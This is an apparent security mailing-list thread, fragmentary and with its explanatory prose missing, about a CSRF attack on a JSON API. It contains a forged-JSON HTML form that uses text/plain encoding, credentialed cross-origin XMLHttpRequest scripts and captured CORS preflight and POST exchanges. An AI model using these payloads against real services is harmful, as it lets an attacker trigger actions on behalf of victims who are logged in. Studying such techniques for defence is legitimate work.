<body>
<form action="API endpoint here" method="POST" enctype="text/plain">
<input type="hidden" name='{ JSON data here, "ignore_me":"' value='test"}}'/> // have taken care of the trailing '=' in case that's what you're wondering.
<input type="submit" value="Submit request" />
</form>
</body><script type="text/javascript">
function loadDoc() {
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "API end point here", true);
xhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhttp.send(JSON.stringify({JSON data here});
}
loadDoc();
</script>OPTIONS API/End/Point/here HTTP/1.1
Host: theHost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
Origin: null
Connection: closeHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200 OK
Cache-Control: max-age=0, private, must-revalidate
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 1728000
X-XSS-Protection: 1; mode=block
X-Request-Id: 3ded8d4a-2706-4f89-9a62-86908b668ed4
Access-Control-Allow-Headers: Authorization, X-Requested-With, X-Prototype-Version, Token, Content-Type
Access-Control-Allow-Methods: POST, GET, PUT, DELETE, OPTIONS
ETag: W/"444bcb3a3fcf8389296c49467f27e1d6"
X-Frame-Options: SAMEORIGIN
X-Runtime: 0.013764
X-Content-Type-Options: nosniff
Date: Wed, 17 Feb 2016 08:14:40 GMT
Set-Cookie: Session_Cookie_Name=sessionCookieValue; path=/; HttpOnly (Not sure if HttpOnly could be the culprit)
X-Powered-By: application server details here
Server: server details here
Content-Length: 2
okPOST API/endpoint/here HTTP/1.1
Host: theHost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 214
Origin: null
Connection: close
{THE JSON DATA HERE}HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 302 Found
Cache-Control: no-cache
X-XSS-Protection: 1; mode=block
X-Request-Id: a27c9e44-3f5c-4669-9c6c-b48f7f968796
Location: LoginPageOfTheHostHere
X-Runtime: 0.021738
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Wed, 17 Feb 2016 08:14:40 GMT
Set-Cookie: Session_Cookie=CookieValue; path=/; HttpOnly
X-Powered-By: application server details here
Server: server details here
Content-Length: 105
<html><body>You are being <a href="Login page of the host here">redirected</a>.</body></html><script type="text/javascript">
function loadDoc() {
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "API end point here", true);
xhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhttp.withCredentials = "true";
xhttp.send(JSON.stringify({JSON data here});
}
loadDoc();
</script>...
--
______________________________________________________________________________
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
______________________________________________________________________________
se7enth edition of nullcon Goa (Mar 9-12, 2016)
http://nullcon.net
---
You received this message because you are subscribed to the Google Groups "null" group.
To unsubscribe from this group and stop receiving emails from it, send an email to null-co-in+...@googlegroups.com.
Visit this group at https://groups.google.com/group/null-co-in.
For more options, visit https://groups.google.com/d/optout.
--
______________________________________________________________________________
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
______________________________________________________________________________
se7enth edition of nullcon Goa (Mar 9-12, 2016)
http://nullcon.net
---
You received this message because you are subscribed to the Google Groups "null" group.
To unsubscribe from this group and stop receiving emails from it, send an email to null-co-in+...@googlegroups.com.
Visit this group at https://groups.google.com/group/null-co-in.
For more options, visit https://groups.google.com/d/optout.
Can u please drop important techical things I shud know to understand the scenario. I m a beginner in web exploitation